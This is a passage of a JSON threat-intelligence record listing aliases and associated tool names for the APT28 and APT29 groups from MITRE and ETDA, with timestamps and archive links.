"Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a", "created_at": "2022-10-25T15:50:23.548494Z", "updated_at": "2026-04-10T02:00:05.292748Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "APT29", "IRON RITUAL", "IRON HEMLOCK", "NobleBaron", "Dark Halo", "NOBELIUM", "UNC2452", "YTTRIUM", "The Dukes", "Cozy Bear", "CozyDuke", "SolarStorm", "Blue Kitsune", "UNC3524", "Midnight Blizzard" ], "source_name": "MITRE:APT29", "tools": [ "PinchDuke", "ROADTools", "WellMail", "CozyCar", "Mimikatz", "Tasklist", "OnionDuke", "FatDuke", "POSHSPY", "EnvyScout", "SoreFang", "GeminiDuke", "reGeorg", "GoldMax", "FoggyWeb", "SDelete", "PolyglotDuke", "AADInternals", "MiniDuke", "SeaDuke", "Sibot", "RegDuke", "CloudDuke", "GoldFinder", "AdFind", "PsExec", "NativeZone", "Systeminfo", "ipconfig", "Impacket", "Cobalt Strike", "PowerDuke", "QUIETEXIT", "HAMMERTOSS", "BoomBox", "CosmicDuke", "WellMess", "VaporRage", "LiteDuke" ], "source_id": "MITRE", "reports": null }, { "id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270", "created_at": "2022-10-25T16:07:23.341684Z", "updated_at": "2026-04-10T02:00:04.549917Z", "deleted_at": null, "main_name": "APT 29", "aliases": [ "APT 29", "ATK 7", "Blue Dev 5", "BlueBravo", "Cloaked Ursa", "CloudLook", "Cozy Bear", "Dark Halo", "Earth Koshchei", "G0016", "Grizzly Steppe", "Group 100", "ITG11", "Iron Hemlock", "Iron Ritual", "Midnight Blizzard", "Minidionis", "Nobelium", "NobleBaron", "Operation Ghost", "Operation Office monkeys", "Operation StellarParticle", "SilverFish", "Solar Phoenix", "SolarStorm", "StellarParticle", "TEMP.Monkeys", "The Dukes", "UNC2452", "UNC3524", "Yttrium" ], "source_name": "ETDA:APT 29", "tools": [ "7-Zip", "ATI-Agent", "AdFind", "Agentemis", "AtNow", "BEATDROP", "BotgenStudios", "CEELOADER", "Cloud Duke", "CloudDuke", "CloudLook", "Cobalt Strike", "CobaltStrike", "CosmicDuke", "Cozer", "CozyBear", "CozyCar", "CozyDuke", "Danfuan", "EnvyScout", "EuroAPT", "FatDuke", "FoggyWeb", "GeminiDuke", "Geppei", "GoldFinder", "GoldMax", "GraphDrop", "GraphicalNeutrino", "GraphicalProton", "HAMMERTOSS", "HammerDuke", "LOLBAS", "LOLBins", "LiteDuke", "Living off the Land", "MagicWeb", "Mimikatz", "MiniDionis", "MiniDuke", "NemesisGemina", "NetDuke", "OnionDuke", "POSHSPY", "PinchDuke", "PolyglotDuke", "PowerDuke", "QUIETEXIT", "ROOTSAW", "RegDuke", "Rubeus", "SNOWYAMBER", "SPICYBEAT", "SUNSHUTTLE", "SeaDaddy", "SeaDask", "SeaDesk", "SeaDuke", "Sharp-SMBExec", "SharpView", "Sibot", "Solorigate", "SoreFang", "TinyBaron", "WINELOADER", "WellMail", "WellMess", "cobeacon", "elf.wellmess", "reGeorg", "tDiscoverer" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434625, "ts_updated_at": 1775792253, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/fb0c003e4f7cb3413a5303e9e563316f5667bb8e.pdf", "text": "https://archive.orkl.eu/fb0c003e4f7cb3413a5303e9e563316f5667bb8e.txt", "img": "https://archive.orkl.eu/fb0c003e4f7cb3413a5303e9e563316f5667bb8e.jpg" } }